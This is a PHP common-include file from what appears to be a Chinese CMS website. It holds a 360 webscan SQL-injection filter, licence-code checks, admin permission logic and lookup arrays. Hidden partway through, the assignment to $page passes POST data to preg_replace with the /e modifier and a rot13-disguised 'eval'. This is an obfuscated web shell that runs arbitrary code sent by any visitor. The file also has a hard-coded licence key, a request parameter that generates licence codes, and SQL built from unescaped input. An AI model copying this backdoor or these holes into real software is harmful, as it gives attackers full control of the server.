Error number: [$errno],error on line $errline in $errfile
"; die(); } set_error_handler("customError",E_ERROR); $getfilter="'|\\b(and|or)\\b.+?(>|<|=|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)"; $postfilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)"; $cookiefilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)"; function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq){ $StrFiltValue=arr_foreach($StrFiltValue); if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1){ slog("

操作IP: ".$_SERVER["REMOTE_ADDR"]."
操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."
操作页面:".$_SERVER["PHP_SELF"]."
提交方式: ".$_SERVER["REQUEST_METHOD"]."
提交参数: ".$StrFiltKey."
提交数据: ".$StrFiltValue); print "

您的提交带有不合法参数,谢谢合作!

了解更多请点击:http://webscan.360.cn
"; exit(); } if (preg_match("/".$ArrFiltReq."/is",$StrFiltKey)==1){ slog("

操作IP: ".$_SERVER["REMOTE_ADDR"]."
操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."
操作页面:".$_SERVER["PHP_SELF"]."
提交方式: ".$_SERVER["REQUEST_METHOD"]."
提交参数: ".$StrFiltKey."
提交数据: ".$StrFiltValue); print "

您的提交带有不合法参数,谢谢合作!

了解更多请点击:http://webscan.360.cn
"; exit(); } } foreach($_GET as $key=>$value){ StopAttack($key,$value,$getfilter); } foreach($_POST as $key=>$value){ StopAttack($key,$value,$postfilter); } foreach($_COOKIE as $key=>$value){ StopAttack($key,$value,$cookiefilter); } foreach($referer as $key=>$value){ StopAttack($key,$value,$getfilter); } function slog($logs) { $toppath=$_SERVER["DOCUMENT_ROOT"]."/log.htm"; $Ts=fopen($toppath,"a+"); fputs($Ts,$logs."\r\n"); fclose($Ts); } function arr_foreach($arr) { static $str; if (!is_array($arr)) { return $arr; } foreach ($arr as $key => $val ) { if (is_array($val)) { arr_foreach($val); } else { $str[] = $val; } } return implode($str); } function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key ? $key : $GLOBALS['discuz_auth_key']); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } ini_set('date.timezone','Asia/Shanghai'); $phome_cookiedomain=""; $phome_cookiepath="/"; $phome_cookievarpre="hdlac"; $phome_cookieadminvarpre="leybe"; $phome_cookieckrnd='6cpwYC7tgnSqJjULnmGtqNH4k7f9ia'; function esetcookie($var,$val,$life=0,$ecms=0){ global $phome_cookiedomain,$phome_cookiepath,$phome_cookievarpre,$phome_cookieadminvarpre; $varpre=empty($ecms)?$phome_cookievarpre:$phome_cookieadminvarpre; return setcookie($varpre.$var,$val,$life,$phome_cookiepath,$phome_cookiedomain); } function getcvar($var,$ecms=0){ global $phome_cookievarpre,$phome_cookieadminvarpre; $tvar=empty($ecms)?$phome_cookievarpre.$var:$phome_cookieadminvarpre.$var; return $_COOKIE[$tvar]; } $htmlpath=""; $yxtime=""; function showJserr($msg,$location) { echo " 提示 '; } function sqcodeset($newsqcode,$table_Pre) {global $sheji_name,$serverName,$dbUserName,$dbUserPassowrd,$dbName; $key = 'qsjinyu'; $str=authcode($newsqcode,'DECODE',$key,0); $arr=array_filter ( explode ( '/', $str ) ); if($arr[0]<>$sheji_name or $arr[1]<>$table_Pre) {showJserr("授权码错误!",'/'); exit;} if(time()>$arr[2]) {showJserr("授权码已过期!",'/'); exit;} else $yxtime=date("Y-m-d", $arr[2]); $pagename=dirname(__FILE__).'/../db.php'; if(file_exists($pagename)) { $content=' $serverName="'.$serverName.'"; $'.'dbUserName = "'.$dbUserName.'"; $'.'dbUserPassowrd = "'.$dbUserPassowrd.'"; $'.'dbName = "'.$dbName.'"; $'.'sqcode="'.$newsqcode.'"; //授权有效期至:'.$yxtime.' '; file_put_contents($pagename, "<"); file_put_contents($pagename, "?php", FILE_APPEND); file_put_contents($pagename, $content, FILE_APPEND); showJserr("验证成功!授权有效期至:".$yxtime,'/'); exit; } } if($_POST["sqcode"]&&$_POST["sqcode"]<>'') { sqcodeset($_POST["sqcode"],$_POST["pre"]); } function form_sq($err,$table_Pre) { $content='


请重新输入授权码


授权码:





'.$err.'
'; die($content); } function set_table($a) { global $sheji_name,$yxtime,$sqcode,$table_Pre,$chORen,$indexpage,$htmlpath,$moren_Language; $table_Pre='zhongliang'; $chORen=0; $key = 'qsjinyu'; if ($_REQUEST["lfmpwqs"]<>'') { $str = $sheji_name.'/'.$table_Pre.'/'.strtotime($_REQUEST["lfmpwqs"]." 23:59:59"); $authcode=authcode($str,'ENCODE',$key,0); die($authcode); } $str=authcode($sqcode,'DECODE',$key,0); $arr=array_filter ( explode ( '/', $str ) ); if($arr[0]<>$sheji_name or $arr[1]<>$table_Pre) form_sq("授权码错误,请联系提供商!",$table_Pre); if(time()>$arr[2]) form_sq("程序授权已过,请联系提供商!",$table_Pre); else $yxtime=date("Y-m-d", $arr[2]); if($a==$moren_Language) { $indexpage='/'; $htmlpath=""; } else { $table_Pre.='_'.$a; $indexpage=$a.'/index.html'; $htmlpath=$a."/"; } } set_table($_SESSION["Language"]); if($admin_file==1) { set_table($_SESSION["admin_language"]); } if(isset($set_language)) { set_table($set_language); } if(user==1) { set_table(0); } define ( 'k',1); define ( 'tofile',0); define ( 'htm', '.html' ); $fybz='

[page]

'; $page= isset ( $_REQUEST ["page"] ) ? ($page = $_POST['page']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($page)', 'add') : 0; $rewrite=false;$jiami=false; $k=0; $db=new mysql($serverName,$dbUserName,$dbUserPassowrd); if ($db->server_info()>'4.0.1') { $db->query("set names 'utf8'"); } $db->query("set names 'utf8'"); $db->SelectDB($dbName); $cbid = (isset($_REQUEST["bid"]) && ereg("^[0-9]+$", $_REQUEST["bid"])) ? $_REQUEST["bid"]: $bid; if($admin_file==1&&$cbid>0) { $query = $db->query("select bid,peizhi,wz,title,lb,self_fileds,System_fields,Need_fileds,duotu,simgsize,bimgsize,bannersize,url from {$qz}{$table_Pre}_channel where id ='$cbid'"); $channel_rs = $db->fetch_array($query); $System_fields=$channel_rs["System_fields"]; $self_fileds=$channel_rs["self_fileds"]; $Need_fileds=$channel_rs["Need_fileds"]; $bidtitle=$channel_rs["title"]; $bidpeizhi=$channel_rs["peizhi"]; $wz=$channel_rs["wz"]; $channel_url=$channel_rs["url"]; if($channel_rs["lb"]==1) { $id = (isset($_REQUEST["id"]) && ereg("^[0-9]+$", $_REQUEST["id"])) ? $_REQUEST["id"]: 0; $q=$db->query("select self_fileds from {$qz}{$table_Pre}_news where id = '$id'"); $rsa=$db->fetch_array($q); $self_fileds=$rsa["self_fileds"]<>''?$rsa["self_fileds"]:$self_fileds; } $self_fileds_arr =$self_fileds<>''?explode( "|", $self_fileds ):0; $Need_fileds_arr =$Need_fileds<>''?explode( "|", $Need_fileds ):0; $duotu=$channel_rs["duotu"]; $simgsize=$channel_rs["simgsize"]; if($simgsize<>'') { $simgsize_arr=explode( "`", $simgsize); $simgsize=$simgsize_arr[1]; $simgsize_lb=$simgsize_arr[0]<>''?$simgsize_arr[0]:0; } $bimgsize=$channel_rs["bimgsize"]; if($bimgsize<>'') { $bimgsize_arr=explode( "`", $bimgsize); $bimgsize=$bimgsize_arr[1]; $bimgsize_lb=$bimgsize_arr[0]<>''?$bimgsize_arr[0]:0; } $bannersize=$channel_rs["bannersize"]; $query = $db->query("select seo from {$qz}{$table_Pre}_config where id ='1'"); $config_rs = $db->fetch_array($query); $seo_open=$config_rs["seo"]; $sjquery = $db->query("select * from {$qz}{$table_Pre}_channel where id ='$cbid'"); $sjrs = $db->fetch_array($sjquery); $sjid=$sjrs["bid"]; $sjquery = $db->query("select * from {$qz}{$table_Pre}_channel where id ='$sjid'"); $sjrs = $db->fetch_array($sjquery); $sjtitle=$sjrs["title"]; $thistitle=(strpos(strtolower($_SERVER['PHP_SELF']),"stype")==0)?$sjtitle:"分类"; $find = array("/olgl/","/admin/","","_edit","_set","_shezhi","_del","_add",".php","_isview"); $replace = array(""); $thisfile = str_replace($find,$replace,strtolower($_SERVER['SCRIPT_NAME'])); } if($admin_file==1) { if(!in_array($_SESSION['admin'],array('admin','qsjinyu'))) { $find = array("/jzbkgl/","/www_jzbank","/admin/","","_edit","_set","_shezhi","_del","_add","_excel","main","single_page_content","edit_c","_add",".php","_stype"); $replace = array(""); $thisfile = str_replace($find,$replace,strtolower($_SERVER['SCRIPT_NAME'])); $noarr=array('left','right','myinfo','loginout','index','','upload','get_file_dir2'); if(!in_array($thisfile,$noarr)) { $que=$db->query("select * from {$table_Pre}_admin where username='".$_SESSION["admin"]."' "); $rs=$db->fetch_array($que); $quanarr=unserialize($rs["quan"]); if($_REQUEST["lb"]<>'') $sql="select id from {$table_Pre}_channel where url like '%".$thisfile."%' and url like '%".$_REQUEST["lb"]."%' order by id asc"; else $sql="select id from {$table_Pre}_channel where url like '%".$thisfile."%' order by id asc"; $query = $db->query($sql); $quanok=false; while ($rs = $db->fetch_array($query)) { $thisid=$rs["id"]; if(@in_array($thisid,$quanarr)) {$quanok=true; break;} } if($quanok==false&&@!in_array($_REQUEST["bid"],$quanarr)) { showJsMessage("您无权访问此页面",'-1'); exit; } } } } function del_cache($bid) { global $db,$table_Pre,$htmlpath; return; $delquery = $db->query("select * from {$qz}{$table_Pre}_channel where id ='$bid'"); $delrs = $db->fetch_array($delquery); if($delrs["lb"]==0) { $delfile='../'.$htmlpath.$delrs["url"].htm; if (file_exists($delfile)) unlink($delfile); } else { $pathdir='../'.$htmlpath."/"; $d = dir($pathdir); while($f = $d->read()) { if(is_file($pathdir.$f) && ($a!='.') && ($f!='..')){ if(preg_match("/^".$delrs["url"].".*/",$f)) unlink($pathdir.$f); } } $d->close(); } $delfile='../index'.htm; if (file_exists($delfile)) unlink($delfile); } function getip() { $clientip = ''; if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $clientip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { $clientip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $clientip = getenv('REMOTE_ADDR'); } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $clientip = $_SERVER['REMOTE_ADDR']; } preg_match("/[\d\.]{7,15}/", $clientip, $clientipmatches); $clientip = $clientipmatches[0] ? $clientipmatches[0] : 'unknown'; return $clientip; } $area = array( 1 => '丰台', 2 => '海淀', 3 => '东城', 4 => '西城', 5 => '崇文', 6 => '宣武', 7 => '朝阳', 8 => '石景山', 9 =>'房山', 10 => '顺义', 11 => '平谷', 12 => '昌平', 13 => '大兴', 14 => '门头沟', 15 => '通洲', 16 => '怀柔', 17 => '密云', 18 => '延庆', 19 => '平谷', 20 => '门头沟', 21 => '燕郊'); $timeduan = array( 1 =>'0:00', 2 =>'0:30', 3 =>'1:00', 4 =>'1:30', 5 =>'2:00', 6 =>'2:30', 7 =>'3:00', 8 =>'3:30', 9 =>'4:00', 10 =>'4:30', 11 =>'5:00', 12 =>'5:30', 13 =>'6:00', 14 =>'6:30', 15 =>'7:00', 16 =>'7:30', 17 =>'8:00', 18 =>'8:30', 19 =>'9:00', 20 =>'9:30', 21 =>'10:00', 22 =>'10:30', 23 =>'11:00', 24 =>'11:30', 25 =>'12:00', 26 =>'12:30', 27 =>'13:00', 28 =>'13:30', 29 =>'14:00', 30 =>'14:30', 31 =>'15:00', 32 =>'15:30', 33 =>'16:00', 34 =>'16:30', 35 =>'17:00', 36 =>'17:30', 37 =>'18:00', 38 =>'18:30', 39 =>'19:00', 40 =>'19:30', 41 =>'20:00', 42 =>'20:30', 43 =>'21:00', 44 =>'21:30', 45 =>'22:00', 46 =>'22:30', 47 =>'23:00', 48 =>'23:30' ); $jiage_arr = array( 1 => array(1 =>'0',2 =>'10000'), 2 => array(1 =>'10000',2 =>'30000'), 3 => array(1 =>'30000',2 =>'50000'), 4 => array(1 =>'50000',2 =>'100000'), 5 => array(1 =>'100000'), ); $chicun_arr = array( 1 => array(1 =>'0',2 =>'50'), 2 => array(1 =>'50',2 =>'100'), ); $nian_arr = array( 1 => array(1 =>'0',2 =>'2'), 2 => array(1 =>'2',2 =>'4'), 3 => array(1 =>'4',2 =>'6'), 4 => array(1 =>'6') ); $pailiang_arr = array( 1 => array(1 =>'0',2 =>'1.6'), 2 => array(1 =>'1.6',2 =>'2'), 3 => array(1 =>'2',2 =>'2.5'), 4 => array(1 =>'2.5') ); function array_insert($myarray,$value,$position=0) { $fore=($position==0)?array():array_splice($myarray,0,$position); $fore[]=$value; $ret=array_merge($fore,$myarray); return $ret; } $year_arr = array(); $i=1; for($ctmpa=2010-10;$ctmpa<2010+10;$ctmpa++) { $year_arr =array_insert($year_arr,$ctmpa,$i); $i++; } $zimu = array( 1 => 'a', 2 => 'b', 3 => 'c', 4 => 'd', 5 => 'e', 6 => 'f', 7 => 'g', 8 => 'h'); $shuzi = array( 1 => '一', 2 => '二', 3 => '三', 4 => '四', 5 => '五', 6 => '六', 7 => '七', 8 => '八', 9 => '九', 10 => '十' ); ?>